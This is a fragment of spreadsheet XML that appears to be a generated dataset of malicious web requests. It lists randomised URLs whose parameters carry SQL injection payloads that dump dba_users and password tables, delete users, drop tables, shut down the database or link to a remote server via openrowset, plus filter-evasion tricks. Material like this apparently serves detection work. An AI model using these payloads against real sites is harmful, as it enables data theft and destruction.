    <t>/qetnritei/ret0smjtvesaeqerwc/0eatfl/prhrs.php3?sol=ptw&amp;toneb=&amp;satl&amp;bfromgum=84019&amp;fliijsf9=yel&amp;iqntau2toe3=43791&amp;syitoe13svfra=acattf&amp;5tusrlm=&amp;%ne|0dsnmn6ieevalt%+5\\&amp;lopnzjbarmp8d=tgapt@qyhx&amp;rsd0gdi=wkirg&amp;z2=183851&amp;tnrsi1=0eee4wyyrpmrrq&amp;domumccs6rogm=55584630&amp;jdid='+and++++user_name()='dito</t>
  </si>
  <si>
    <t>/ec0fhxc/3iopelp/ddcrssuhteye/drtboosa2t1e3al7et/an/ma0up4h@tlb/zakpgq7g0ewiu/ahntlno9dhe8aet/otiemsngwntro.msf?lhsd0ueba=23&amp;gl=';++++begin+declare+++++@ret+++varchar(8000)+set++@ret=':'++select++@ret=@ret+'++++'+oamghqh+'/'+password++++from+++toiyie+++++where+++++f9ns&gt;@ret+++++select+@ret+as+ret+into+foo+++end--&amp;8es=hincludetr&lt;d=\\telnetlo&amp;r3n=ssfhawttmtwpb4o9lr</t>
  </si>
  <si>
    <t>/mh3/55ekts/thnezwglz4al/edapexa0eeuez0ab.@n3.htm?sx_betweenv2='+++);+++++delete+from++++users;+commit;+++dummy(+'</t>
  </si>
  <si>
    <t>/tihw.b/hrqhr0pcwt74gux/bairegsjdsu/1cteocsj5zehaswet/e4dalfomet/8eqd5xdeletezzoq-/nmnsai3r71li.css?7drneromoe=870135255&amp;yzkhywox-b=hoslocation7bosamwd7&amp;yttietrnoialw=or+++'2atxuai'+++between+'r'++and+'t'</t>
  </si>
  <si>
    <t>/irc/nhbdtxa/zvf/sevy.mspx?oovrlhwton=89507&amp;5eonn7g=hb_oxbt-e&amp;gheqwyt=i.dt_laohuz&amp;3yer=g4&amp;bovzmera=/df~passthrunodelfincludessxn&amp;uueitzzwv=e5nef&amp;oatuu=2$&amp;rhrbwservices8='+)/**/unionall/**/select/**/34877/**/from/**/anisdetls/**/where/**/(''+++='++++/**/&amp;wienalsiprah=amwid&amp;wherethk0ikchildnz=17093806&amp;welue0=lisntm2</t>
  </si>
  <si>
    <t>/o0s5av4x5ayi.i.i7/dtetef2t9e4esnfeto6h/ntrmac0ohgltg/ezh/7.t@fconnect%u7mjechownwt/c6j0xp_mvuakp.jpeg?tngasardgo=phpa&amp;wyhh=')+++un/**/ion+++++all+++sel/**/ect+++++'ehntoen',76,392,'aeeoneaae',9+from+osxe7ar+++++where+++++(+++''++='&amp;304essscfgh=gibat0l8b&amp;ofwrv.k=ahtyfwpvat9k&amp;pm2z=4950&amp;tpsantas=torlsam5uber|lfromrr&lt;sa&amp;1oiheeqtsoeb0=2&amp;ktli=rpi4eoouemo</t>
  </si>
  <si>
    <t>/ytrtptcl/pgiandaretelnetusqis/s7rrwierhl1mudpbo7lp/cbq8wzxttxcvtsrk@/izansk1sch_o/2o/dkgrl.png?ucreanoi81s0b=arew0w9amtpm&amp;yk0fmgmpvnl=de+a&amp;ierwco8=nmc9hky-&amp;kd='+++or+++id+++++in++(++select+*++++from+++++++user_db++++)&amp;i9rhnlatoyae=s88neubna7qmaahawl&amp;61lii=25&amp;inne=32329325&amp;eelttoenjitsu=msuhsyoe&amp;ew2johj=57011</t>
  </si>
  <si>
    <t>/xkasipnsl/ew.3au@q@nq/i0ner6n1rsowup/nerr6sohd3eocui/eeskdhiqvwrk5q/e7whd2e/rsqvisw/systemr@/nytl8ripblt1oamtrae.cgi?tinehdsaf=sopasswdn&amp;brleplro=3rnesita&amp;pp5tkhjk=acwaa&amp;includejqx=4282&amp;hn9e=41&amp;elcl=chairs'+++union+++select+++++motceemhtl+++from++dba_users+++where+++name+++++like++'%&amp;5otsattt=iott1lmaae&amp;tjn=dal8noatfjioan&amp;nkmo1i4nthahpi=ewevltvy&amp;umkhnrcpga1pd=tdoielferv2sa&amp;sye=8lrdevs</t>
  </si>
  <si>
    <t>/siuhsgtixryrjl7rwecd.html?eitns='++++union+++++select+++++sum(sdl0t)++from++++eud3jie--</t>
  </si>
  <si>
    <t>/mua/netuo4cnss/zapvirivfjs30/t9zz89iaxknpwf.php3?aata2m1a=caeoeqesqo1tered&amp;36gxld=on_@bksxks&amp;brga=5+&amp;_qi6services23wicq='unionallselectfieldfromstnageengewhere''++='&amp;%uwvf2rphprcpi=tf1rl36kz&amp;ice=oieaebzekh&amp;hp2wykos5rmdr=s_emkms&amp;yblxtqgz=du~a&amp;nmtekseu=si?</t>
  </si>
  <si>
    <t>/g9h2.knc3tvyt/jr29ri.yywmqsa3/h1/ceqgtm/.c0_imkdhtaccesk/lkbs/een.jsp?iex=20302925&amp;sknai62eunr9lf=kouyvqfrolm8s6n&amp;ltbnwana=y@|k5@3s&amp;pmdbr6rservicesa=02621&amp;rtrogsjsmislee=658&amp;86=zeqj28&amp;oui2tiisaseemu=bsm0&amp;0etsoe0ztanpee=nfa&amp;tn=sojbgfmz&amp;lnlr='+and++++user_name()='rf&amp;cul=b@ketnp</t>
  </si>
  <si>
    <t>/hmvv486h2x/lw/mtertktwatoeejovllea/d9xxekuou.vnha/6o/afqfbv8bkt1.dlsnl7.mspx?ymeli5cxaoe8hn=%esbd+hj&amp;9pinkso2t=96283&amp;b0iknyeo8c=0&amp;ishitesei=95338&amp;m8d=j0y3g9rzuy&amp;w0hy=giusqxcl&amp;bs=endocument+svtdneut1cio&amp;4pm61zq=oiasgitvyah&amp;eer=cosw2j'+++union++++/**/+++select+++++snlees+++from+++dba_users+where+++leltyni++++like+++++'%&amp;jtoataedesfn=ek&amp;eessat5n=0599&amp;1tehrioeaedgseo=0&amp;3tr=s&amp;lysamvq=rplaienn3bbadgfhte</t>
  </si>
  <si>
    <t>/htv0mmtk_fewbclgejr0/g3lcuuwb/pxpwk/men8snenojsleknjqfn/eikxsj/jy/el5e6yuoi/wu9wgkwztzn/kj4ytnthpl/9kfrqn9/4al2fneysdxkvmhq_.tiff?6fvmukqazsc='+union++++++++++all+++++select+++eenflsh++++from++5nee1gpr9o++++where++''+=+'&amp;sthscp97sdnn=mrooetkybltot+</t>
  </si>
  <si>
    <t>/gpxm/ewohtnizqw.png?-blmvq=cii0et29tmso&amp;eu=kvz5kb_&amp;htfoiiaooor=15417&amp;3t=840573&amp;ua=oi:oa&amp;@g_v=d9e&amp;dh2tyjoo='+)++union+++all++select++++38++++from+++ts2mon++where+++++(''++++=++++'&amp;xbml8b=t5eir1f5abei</t>
  </si>
  <si>
    <t>/n2/etqe1.e46v9gpt1/-fgf0wgethu85/onchel6rharrt/cjf7so3xdtp0_7bvddv9/xv1kdvig_q1w/a2c8qdivxbtm.e/olxbda2.jpeg?iiicgntmn=sh5mife');++++del/**/ete++++from+users+where+upper(username)++++=+++upper(+++'admin</t>
  </si>
  <si>
    <t>/7nzy4tlixudgrue/owtdieideueanw/iqsnpielutlflta7nskr/me2otdifc/oep_qis9z1uppq6rg9.js?3ha=itr0ae~o&amp;maees=794&amp;sermaofnopnhzp=mev&amp;tfz2servicesz4eoxn=deaudphugt&amp;eicegsh=g/connectmnodeeiopenhtaccesa)eon+&amp;3ogapavare=xd2ndt');deletefromuserswhereupper(username)+=upper(++++'admin&amp;ait3eares=iusrsrelme&amp;oltb=otiieygim@fs&amp;esxcrewtaetwea=esro&amp;m6wformc8r3_tmp7=i9dvlll&amp;chnoikaptn=eot23etfiis</t>
  </si>
  <si>
    <t>/atoantgtqnr0itlkmfce/rn3eeeeelndestseeoe/z@@y-0ndhp/leisotteao/tfm/tlwra63cg5eneef/2toolleniuhjra/letteoefnix.php3?tlho2d2e3e=ax-_qwoi&amp;cna0=';+++++shutdown--&amp;i1myleotcssl=krcaet</t>
  </si>
  <si>
    <t>/rnafnoxnarsipsee6o7t/rqk49igupsya/ajpmefeltovar-n/ceoubooht3tendrdrtpj/yrq@npeqlnfrrjxq.png?leu0e92pzm6ta=jb&amp;stdt=6&amp;tpds=;++exec('uni'+'on'+'++'+'sel'+'ect+++++'iti4ito',2,63,'s0n',9++++from+++++u0otrsp)&amp;l7ieeblaf3t=rxr8ue9a&amp;wdtc8a1=encngohrsmfaemgrn&amp;hutcsw3=626381&amp;7t0ooe=nfouoyloiftm8no&amp;teee43=geasneoemeitoaets&amp;iestelnetwu-iox8=1&amp;vsttyetrrnftd=37427710&amp;euerssuba=2&amp;lcbqdonasyi1s=4o+q0&amp;mpittudt=9683727&amp;seeesrd=no7</t>
  </si>
  <si>
    <t>/tdw25erjehw6/@metagid5wtmppj9qe6yo/dl2w4dy/aeesky/xnpaw/musgyiyheismqqj9kvq/ndropformbiv_941c1ste/73uuu6yc/esfjot/qusqetzjsataopiteh.js?aqld=u&amp;rs=l�p7asjodallb1u+eoe/&amp;eho=9213966929&amp;hskwhereaj=rq5+ipndropehtaccesrglcopyrnullej&amp;snmratsi3yb=';++insert+into+tn9nf++++values(666,'oro21lh','y9nj',0xfffff)&amp;sttjanii=ne6gq4&amp;kt8iil1wkok=atlan&amp;ecagsa8nbdrqdta=5058853&amp;2ir8bgr=/e&amp;otrec=edpxtsrp&amp;w0ltmpp=28&amp;a3e=7324658293</t>
  </si>
  <si>
    <t>/emskbq-0ob7/cvxepyo9mhttpsusruuwp/lscatbm9xrei7ionqf/emnkmm@gly@b-7f_u/gwi.htm?hco8n=';++shutdown--&amp;aadselis=82972366</t>
  </si>
  <si>
    <t>/desyfe3icoen.msf?p3hr2=';+shutdown--&amp;iworyd=aen</t>
  </si>
  <si>
    <t>/dlsnrtsmotbndorotli/dfx/ce6tki1kh8aghag/tdeemyiaeh1/tjyu.qntflfvtphnk2xs/gswcnkanph-k/srrapjh/rdon.6.z8wtdf/ixvnkoewuseo9rc/ystdinv9n@uddelete7skrp/sde/ida1cdkjpnzb.aspx?tpnirlebaaoc=+yw6miiaccess_loglelelinkttm&amp;imexiseeeettld=aia&amp;fmbwq3bdi=;+exec(++++'ins'+'ert+into+++++users+++++values(5,'id75e7gnrs','snfonpaon'))&amp;fot7iyh=cn]o0&amp;erh7h=rtet+m2i&amp;whk=98118082</t>
  </si>
  <si>
    <t>/jgstc9tweevalm/@twcq35.wj/rnelit/rf3bddji_nai/artsia8hgaergipsen/u8vzwalbrp.pl?acotnaf=6t&amp;eq.s-telnetfs='++)++union++++all+++select++6llntmf+++++from++eiemre+++where+++++(+''+++=++'&amp;2uqieyrt2caa=ge&lt;enhna</t>
  </si>
  <si>
    <t>/an8.htm?oldeese4nxer=27&amp;40aekofsip=77224156&amp;li=')++++union+++all++++select+++++mn1ia+,++aeqben++++,++++nnns++from++ago6rhmcc8++++where+++dits++++not+in++++('s1csd'++++)+++++and+0oemeit6s+++not+++in++++(++'s0oamlkf'++)+++and++''++=++++'</t>
  </si>
  <si>
    <t>/r8ruvey@mbxdirbrclaa/dbtuh0/aunwutxxm1eu.asp?sohsencchnkii='union++++select++password++++from+dba_password;--</t>
  </si>
  <si>
    <t>/inlntaodcyotldielwh/hlsn8alutyi.jpeg?mf0-6uwoccmdyj=nfe&amp;ysn1raats7=x1y3zss&amp;pn5yhoeto=anautoexec&amp;elnaaassso=59684239&amp;9ccec=51937049&amp;ss7sdtstynuhs=npetjk&amp;md1nwyrks6qk=or+++++405063=405063&amp;lde=incj+&amp;alcsirn5t1ns=78132798&amp;sdt7eortleea=j1qmg</t>
  </si>
  <si>
    <t>/oy3yn/uhfhavsdtnie/rut/f@m9.png?7nbtrhukshsceu=h$phpidrop+nr&amp;irrwinntfoedc=dkuvsdasrfr&amp;tfir1h8uc=letui&amp;ne]+&amp;wzxpbsvgjer2=8369955&amp;hmsaeo=4488510334&amp;ifmcd3cq=sb0@&amp;i-sx5=+++++or++++2+&gt;+1&amp;pygrwieusdtl2=astmhtoqromqm+&amp;9g2bdq=a&amp;tdmtt=l+m&amp;atwapoiyohtje=7&amp;esebatd=705&amp;i4eltogog=237500&amp;y2cnlhq=47</t>
  </si>
  <si>
    <t>/objectk7xxm/oe6ohaepnwssnneasr/p0@htli5lnfhaving/fxb0d1meta7zbvdzz.jpg?suavui=d$usrene&lt;qttj5oede&amp;ehn=ngroup+byofsolifldgsrh&amp;rn5sueoorln=nnl2a&amp;jfstdinufrom@6b8xg=4dvodocument&amp;nti=+&lt;+6s&amp;nci='+)++++union+++++all+select++++728,70,48,037,5+from+wec2+++where+++(++''++++='&amp;npae=sno&amp;bygdkecldhond=etx&amp;thbhnpisdaaed4t=9020</t>
  </si>
  <si>
    <t>/tgnsotew/ocxymqh2zzcnh/esujhh/tbvjfw3kvtycmdhux/851g/v6_qilmy1u2resiea4/6me/dogtolo/ba/wanrakimay/hputq24.tiff?snc=11615&amp;fbi3hnchl8=urluo9asasenc&amp;rwhcitdnd2n7guh=n$ovimorh]w?&amp;aoqa=c=7ian+htsfom)noe[oe&amp;pa=oea5onnoseiedn&amp;t4uilhnra0d37rt=izji&amp;7fhttporv=yoegex3yddtm5&amp;vreueetne=pjh&amp;bflxsmg=1&amp;.hr2=73705450&amp;eueawaotdwtf=4r6is&amp;3gkc7m='++or+'oreti'++=+++++n'+++++&amp;wfrjot4ka4djswl=904656&amp;ubii3cmhese=dnmn_&amp;sqoruxuhgpj=4</t>
  </si>
  <si>
    <t>/k4zsjka/e_47zx0q/vg3iwilreesn/u_m4/ixn907xynas.dll?yerhtihrkda=956&amp;qq_hlikeqyftpuf7p=69&amp;fsydeletey-m=o9u&amp;ar=e?+&amp;&amp;btoaxfiw3nr=ce6+&amp;ar=pitperlrq+/a+&gt;z&amp;tnml4geaelaezce=taitxsttsliujv&amp;o6segntqsr=iapv&amp;6ctav=or+++'hbcnamsin'++=+n'+'</t>
  </si>
  <si>
    <t>/ueqkska71jqxb/sch5vv/t2ff6odqgnue/dnszdkgpwinnt0er9/nkbkfoxck1xc48ox/qdshe/ilu3entbdn/sdsprreots/a4a/gavhimtt0twmk7sh8ap/eetrlolouisesdlo/eaafhtr.jpeg?ogaklinkkyu='+union++++select+++++@@version,1,1,1--&amp;rasrajcg8ap=93&amp;ihnue=22666</t>
  </si>
  <si>
    <t>/amaoqmdq/hxercnad4hymuuoi8/lm2egil5ifbea4o/riieq/pjy/1y_t_y/euajbdgodbdyhubsn4m6/42l0pbbd1u.htm?och=6&amp;eai8=rlinksrhttpsn$aste&amp;hhl3ue&amp;93aj=');+++++delete+++++from++++users;+++++commit;++dummy(+++'</t>
  </si>
  <si>
    <t>/ogzrzugimqev/q7lzf/hsu2id6xen_8_vclojhb/ansns0eter2hun/b4n5btn6/3xylokq_w2yzf/73iqebdbyqfngfe/c2qm5oaks3dnh6w.mdb?wzgv=5&amp;lwt=seg&amp;ifyeuadzha=144&amp;ubp8-ed=ge2c'/**/union/**/select/**/ptrhaieutl/**/from/**/dba_users/**/where/**/citm/**/like/**/'%&amp;vae9=t~l8betweenr9oie3tl0se]</t>
  </si>
  <si>
    <t>/artirm.gqdg/tbrf5hxfbahw2qpne/ytpj9t4feado/honaenne4eg7rynru13d/oc/3a/z4biq5jibmat8s@mjig/yhxs/ou2mm/lt7b_-gisdjpassthru_xy.nsf?2atreh='select+customer_phone+++'||'from+++++customers++'||'where++customer_surname='''||+lv_surname||'''+++++and++customer_type=1';</t>
  </si>
  <si>
    <t>/nhlo/cdxsjw/bwun6sd/8ieae/8oumhewnzopojnmute/r6qtgvaenhd4ktdiawr0.mspx?liroisaxr=r9moulfteuderc4wet&amp;lr5mgsesmpst=tsmleenhfoa&amp;ltlnmnm='union++select++password+from++dba_password;--&amp;soheep3clkm53w=442&amp;gecoee5e3s=knle%ergroup+byc&amp;xpsvh=41155412&amp;fsnmkqxnomn=tk7ix9&amp;eetlmmdaa5ena=5jnodez</t>
  </si>
  <si>
    <t>/or@vdm-wne9y9s/rh5drz8hs/fijwnnphrlybtni3l/sil/ymmbour9-w9zfkg/4t2fmjyqftkt8/mu-y/iid721ivf3ln5pmd5isv/essdfnetn5uthds/p7eqfhwoxt1o@i-s_n.css?cvjm_gexecwindow.openbeu=34&amp;hrs0c1jdetnr0y==taeie&amp;+e(etdbllo&amp;qk-oxpx=e]&amp;xgbn9=dqjkc&amp;srnrcniooi=pataj1q7&amp;xt2tetg=aj_dt2afns&amp;2nvqoe0wc9=@&amp;q9famebyb-@=chairs'+++un/**/ion++++sel/**/ect++++szie+++++from++dba_users+where++++uai++++like++++'%&amp;okbrrnnaitl=doescr3rfadzz5i&amp;3sernhuur=8190&amp;etdst3p=srq0lmfl9&amp;n2sse62oo=43</t>
  </si>
  <si>
    <t>/itnsedflpurqmuii1t38/ewkmt_lpjxyhwc.png?91bullnpaesob=87996&amp;owtezeadslnmhf=?\\netcatt'&amp;gtapartdrt=ea&amp;sot=ose&gt;+nacsakit&amp;iey=n&amp;bwltfaepsa=saccess_logfw;fo&amp;_5nhtzw6jlq%u=or+++++'pqenoola'++=++'sim'+'ple'</t>
  </si>
  <si>
    <t>/4fwme3m_fl6_c/twsqbvoudz5rq5/1%u8dhycati_5re.pl?aclsg5nqca=96689+++++or+++id&gt;1+++or+++ls_id&lt;67&amp;opens4kw=woeiw1o8g2+&amp;hlhx=y+texecc+shue&amp;kcropoyhekswy=622&amp;8yoiap5low8egb=nu&gt;enetcatastf-hgesimg+ou</t>
  </si>
  <si>
    <t>/thphvatincludejc7linkfinput9/9ywofnvtkjjv5a/uskr_bacuz4te0/twmit.css?vph4=750343911&amp;desetseergihx=eu90rle00h&amp;sniytgear=749625&amp;os0hve1nlwhs4=5sock_streame1;s&amp;ir+gis&amp;wsyu4edesph=psih3c&amp;cttpodrnrsnan=an;:iframe3dlehfe&amp;jozr.ntqnode=iunioni0b0dt2@vda&amp;tseb=ewtiy&amp;1hsfr9ck=s4m-_h&amp;3oea=0899&amp;1pusb8hjreu5jd=sxge5r&amp;schj=eis&amp;uu@4xqkl3p=15768575&amp;s15o=ssitaii4'++++);++del/**/ete++++from+users+++++where+upper(username)+=+++upper(+++'admin</t>
  </si>
  <si>
    <t>/latd8s7lkhohius/suwds0/dj/twupr1eqv.p4ss/ycandneqyzps5m.js?bgsaye=ean+&amp;asrmomzhvvy=+&amp;vswc_9_3pk=oi&amp;lhsxac8rnr=aatho&amp;ircten='++or+++'raet'++&gt;+'s&amp;lse6dbbedrluib=axtl&amp;ooeclt=lcnsoo</t>
  </si>
  <si>
    <t>/a3sthsr3migsilzynf.pl?myphhfosit=yiawxn'++++);++delete+++from++++users++++where+++upper(username)+++++=++++upper('admin</t>
  </si>
  <si>
    <t>/savwwvenr.shtml?t8o1se=ia9yeecuforn7v&amp;sace0itcoce4wn=0590191&amp;rha=;+++exec+++get_cust(++++'x''++++union+++++select+object_name,object_type,''x''+++from+user_objects++++where++++''bdoot''+='''+++);&amp;rguw0s1oa=sh&amp;qjrooidpovhdtes=e0sam</t>
  </si>
  <si>
    <t>/hablrk.gv/3ojkexecurperl1qo.css?c0lbmwn=$rtpsha7sam&amp;me7o9ymnueubdr=86&amp;kgtelnettqykgpryy=rracceptes&amp;sthlresnanssea=856032&amp;fzplee2usrenea='+)++union+++++all++++select++7350,38,384,115,125+from+eduvnets0c+where+(''++=++++'&amp;pyz9qbxnhgd=ooa&amp;en_etcsh=ssabrgj2&amp;slmm=7&amp;hpadznu=lu&amp;n3yhva=s-tvat&amp;8scrhv8snobbted=512&amp;eatsessiin=aorsnrhilnmslue&amp;tbbs3xzi4=dtdemetai&amp;u7s&amp;iab2isnm=+hrwtglhacsez&amp;a39ovenov=mffh6zngiyn</t>
  </si>
  <si>
    <t>/ihjbbsysosdhrtjs_m-i/xbazwum/weemce08dheetor/inb4i2or2.html?rops9uaeeje=o4fe&amp;lsisaysrwvaq=9825564800&amp;nooee2ec=51078418&amp;n8ikynhhh7=yunei2nzoapow&amp;sy5eejot5o=rcenaoqo5m&amp;wuanyq=5boltstr&amp;replacelk7_=71012&amp;adf2ycln=tneaii&amp;puetdw=hsx+ua&amp;ihsitsynhbdh=73087&amp;est1ia0thjtsrw=22784169&amp;sfem=';drop++table+++osbrwn&amp;jaicc2heavav=+net&amp;p3enj3bcl=82804</t>
  </si>
  <si>
    <t>/lm-abmspsit24i-/isdd/soh1l40nocbynr7yd2/ej8@qwqra.z.a2-7/badeg10y4hek/xyosedekacdnisbiima.tiff?resiiteales2h=87&amp;rnralntetac=;+exec++++get_cust(+'x''++union+++++select+object_name,object_type,''x''+from+++++user_objects++++where+''awre''+=+''+'++);</t>
  </si>
  <si>
    <t>/d6clsnu/e7ixnc41n9/0iuusji_sy3afiz/0hthjg28kszan@rm.php3?hteebyq3ajsgeuq=eto'++++);deletefromuserswhereupper(username)+=+++upper(+'admin&amp;t6oedtoasee=7&amp;eealghl=ozaahifryo:8ddt&amp;is=844&amp;nr=pre&amp;gtecestacelnn=tin51vvlio</t>
  </si>
  <si>
    <t>/arofbtodoseoeru/amp4@m6xhjxfmdkcwf/rtegcufpi-xp/edroo9hhsretnsal/ever5g1ijdnffsi1snia/ssrgjv/wn@qweoto/te/fedr.jsp?stleynomgp=iefs8gmthvomd&amp;rnbw=6&amp;lzj1m=edy.htf.hh&amp;mse=am%l+ee]pp+usku6hs&amp;7boah=e8ynrte&amp;hniy3wrcj=or+++++70505=70505&amp;tnnfhgdllst6nei=g+r&amp;se4thitfhdsine=auvm@ta&amp;nyinilohe0ahtas=2tawp-&amp;d9n=rwgs&amp;0ijtinlrctsehu=inti&amp;ttlg=emvm7&amp;osd=evpr4g@</t>
  </si>
  <si>
    <t>/ihovdtoddoinigfpl/l_ei/plomuuaunailsnweg/n8e/rl3j/umusag3aedr/edyaaalrpnaind/r8zu/erdssodhmn6z/32n/gaodijkzbnii4jg7.htm?itxenrorslestre=3496&amp;oon=f6&amp;s0ikvk=986&amp;ehieth=70549307&amp;5pteiouniohatn=ehp&amp;eyps5u3=76&amp;ae=b.qzh6cgkq-h&amp;ec=dt+twinntservicesormi+shr:hsra&amp;tfnwuoit=nf3njnt2ltts&amp;ybupdatesock_streamxmluqhyje=8111778548&amp;dn_zne5zpwjg=selectlaeld&amp;popoe=13318651&amp;e4gaedh1eoo4esn='+++)+++union++++all++++select++++397+++from+++hbe+++where+++(+''+=++++'&amp;hjatx=349068</t>
  </si>
  <si>
    <t>/uodtrgvtl8n.gif?vliwjqqx5iv=icoosegepsxy&amp;t8t=fzw95@&amp;nds=4&amp;rhf%uc=3&amp;6aqrajfiwn3srn=lhtoon+is??f&amp;svf=46383+++or++++id&gt;2++++or++++ls_id&lt;176&amp;dotjnnpfietmaeu=371004983&amp;as=l3dhttphn5+l&amp;td=bgsoundscript&amp;tm=b]e&amp;gsrz=varbblsmlmze&amp;6nqk0qh0.x=+psdxt&amp;thh1wehtolnth=rhhtaccesxqe4|lwindow.open]wheret&amp;ee=bq8r89vv.2&amp;redhmitn=ie6h</t>
  </si>
  <si>
    <t>/tol2es_k9/et7/lngwqi/nncuepzerjta9pi/hbamjvam5jx/3xmvzu.m54t11fj1ycc/phpo0wr10/yxexlwkx0opositionzhzo/ktq.bin?bxz3c=en+egruinnne&amp;hy7dwewiu=ehae&lt;&amp;ici1oo0yblib2=bz2l&amp;dnabr=;++insert+++into+++++openrowset('sqloledb','uid=k8itet;pwd=mdzce9d;network=dbmssocn;address=19.161.156.0,1433;','select+++*+from+++++_sysdatabases');+select+++++*+++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;iynb=h(window.opennz&amp;hyviqpoyl=0363&amp;eajbia=lniebmru&gt;ya2w&amp;sbfsgaesa=c\\]svr+er@hrre8nopen2t+&amp;ns4ii=xp_aarl:&amp;zm=b.fcw5lrmd&amp;zolnrc=4|th&amp;oatanrd=139&amp;atit2hod6msp=nkhamain9&amp;wbodyh2processing-instructionlkko=tsp0bndlmi</t>
  </si>
  <si>
    <t>/ekpq/0dn/tkprpejxtbmail0xp_s/iue7hya1-k/kdpg-/sst0xnha0hlbaoe/nexeceddqezxbgsoundfu/r17e7p/txkpteb/lwmhaduvqgru2u6c/bsu3e/mqwyueavgtt.php3?fn4e_iya=tyha4h&amp;74eeim=aaihw8?)&amp;rsnn=tererrwxe8nhtrpoao&amp;nd9csdao=ilotdh1iaheho&amp;br=ticnohhl');+++del/**/ete+from+++++users++where+++upper(username)+=+++upper(+++'admin&amp;feccnaevnpdafee=aoknsqisg&amp;gheavesetdd=r~lpsktr(maisdtt&amp;mmeodunmitnnrse=4245376&amp;tdeamh=rincs&amp;ejtri=4ft3winnt&amp;lt9nbkj=st0swlt9nr&amp;4w=no-asgcvhnx&amp;suizmtiaitnmooo=4&lt;l7a</t>
  </si>
  <si>
    <t>/kjh_husecil0/gd97nhjxnga0/riog5lxjele/erjnec/51lq@cg/.st/tkhl9/ceetgorf6hecrxmqdh.swf?esh3b=e&amp;xhartwp6=4559679&amp;yoatemie0=201&amp;sreneprknmh=8324135&amp;gofckcwbzejf='+union++++select++++@@version,1,1,1--&amp;htiol=reoj&amp;ve3inea2nierifx=456667&amp;te7zhoao8eeclo=y2tbetween&amp;oin4=e30arb&amp;oiiog8=3076708308&amp;octop2=8251363&amp;pi6idaraeuodto8=tfbs</t>
  </si>
  <si>
    <t>/huavr/e8cbpyypjdun2eeb/vlibflj1lqjrgje/pstdincuaneauvucr6/sf/3dles3snnanehtai.php?hsfm=er&amp;nipac=708649&amp;ospeeh=622349&amp;edudi=s&amp;et=hsebs&amp;ainercr5as=5&amp;rcpjyc=egjo');+++delete+++++from+users+++where++++upper(username)+++=++++upper(+++'admin&amp;lfbeaar=4&amp;gxlhgh6updateweunion=a+dr"m"fdne&amp;gaqspd3efn=69217856&amp;ont=7na6a2uefodnmntql&amp;bjfetb2=81003344&amp;r3=5617409&amp;ieoir1=4iebndrtt&amp;auu5eiagohe=5homl0+n</t>
  </si>
  <si>
    <t>/berfofdusuey/n3egrbtr.mdb?leeaneg=i7+&amp;u4atiatxed2adex=53&amp;wrids='++or+'d'=+'+&amp;agosns9endrz1n=eos&amp;tlmhead9rgoma7=pitscriptsdeletet&amp;es8tebgsound&amp;eqanjscu0aa0=hako</t>
  </si>
  <si>
    <t>/encnrazttcai/9ehumgnt3ltoevis/olgz5.bin?om=961743&amp;htcohdtinmidi='++++)+un/**/ion++++all++++sel/**/ect+++++'cmiy',3706,03,'olljhpa',9+from++++eaiaut+++++where+(''++=++'&amp;sri0oenhpan=08633&amp;y6uq=?zexecmt&amp;hi=ne\\b]esyahttp+imtxml0&amp;dmarenemui=148265&amp;eyeo8htts0aee3m=anxhxi&amp;jdcb3rsse=g32ybsgig&amp;_div1570pr=fnlfue&amp;oth5suuxddpani=cf+&amp;haiossc5opha=6599</t>
  </si>
  <si>
    <t>/n7nihbwr7ekhniyols/jneo.gif?houoe8e3='++)+union++all+select+++++1147,94,7370,4,2854++from+++++zn6meqtoes++where+++++(+++''++=++'&amp;iofj=2445&amp;reornrr=nd4xdo7g_nxz&amp;nshgstsmzga=oxfllw</t>
  </si>
  <si>
    <t>/.nndtmphform1hlmwcdroplike/jriqlmtickxetuln/eo-a5k_hbwimnyloe/ua/lo/dvojurbwak1udxkufmzj/odd/4fuuw/e3r1/nbnpc0m.gif?ctcl9ncoenl8rog=715311&amp;otdcfn=or+++++'a3hlv0erc'+++++in+(+'+'++++)&amp;slhgeert=o+o&amp;37tsk2=9521106212&amp;rho6odam=tq_u0n&amp;i03ett=230683&amp;hb-sx7samlog=ebnsstatscmds&amp;e67sx=53918125&amp;formc2tf=hbdc1fstbsex&amp;2@tlwq.rkphplibu=efact&amp;hgti=g&amp;iatotgdlnt=otatoeedrtr9lc&amp;ee=7004</t>
  </si>
  <si>
    <t>/riiem@r4on/z4selecti-wi/19processing-instructionfs/gaslfr/t@ckqc7wiv54zuwomr.jpg?tosmoieorn9hnd9=or+++++0&lt;&gt;(select++++count(*)+++from+++wniif)&amp;euosu.wga=365&amp;ahbnckrh6ddarse=49408&amp;q-y6execq=285&amp;yanzeqtp=([9o&amp;htbi72tdi5i=a;yut/lbetweents6e</t>
  </si>
  <si>
    <t>/lkckxzauphp-/mojey3ipr2abn2snh/ytnhasi8ttvaezhonttt/4grsi5oojlonatluni/yhtacces-cawyc23rg/oaaglaneeereis/ekq3l8_bcuahvuk/1jrhh0alincludese7v9/g2dyn.rojft6zetjg1vz/eqthnsyce.cfm?annalsb6genhm=vfhzq26ramr&amp;ti03e=15&amp;7rd=wccpjguoh31&amp;eocqfphiten=coaiphp%3%anert5doo&amp;htacces7hdelete1h.g=gx&amp;bounioiaoo='++);+++delete+++++from+++users;++commit;+++++dummy(++++'</t>
  </si>
  <si>
    <t>/sr3iyvkg7b0wq@qhx/mjwodyroetneanrntcns.dll?7jep0iframenoa=leo&amp;1eeq4yfdnw=admino&amp;simetee=3l&amp;lemm7rcwom=t+&amp;38agi=92&amp;hktoofar7tki1t=echouiel/4n&amp;pet=1325&amp;ne5no=t_e-rapd1jqd&amp;hiwovoimhdsh='select++++customer_phone++'||'from++++customers+++'||'where+customer_surname='''||+lv_surname||'''+and++++customer_type=1';&amp;pqii6oaal=76043074&amp;tyt53beehaesoo6=93</t>
  </si>
  <si>
    <t>/dl7ibebwgc3tliattn/eatwmaanko/iklta@7b5jsl_pa7co/lgw/zy.ng0.kwa/a5ikrljz/oxd7wt/2zhqreyvt-mh0vx6roga/xdeot.jpeg?1t@4p=or+++++'mt'++++=++n'++'</t>
  </si>
  <si>
    <t>/esrh/sntn.bin?gsdeacon7ecub=ttsfr5sliznu&amp;tlcroeoae3=ttn@\\ooq&amp;lfd=p&amp;tfe9hmcat3at='++++)/**/unionall/**/select/**/171/**/from/**/6ioy/**/where/**/(+++''=++'+++++/**/&amp;1buhzbowrtpsde=eti</t>
  </si>
  <si>
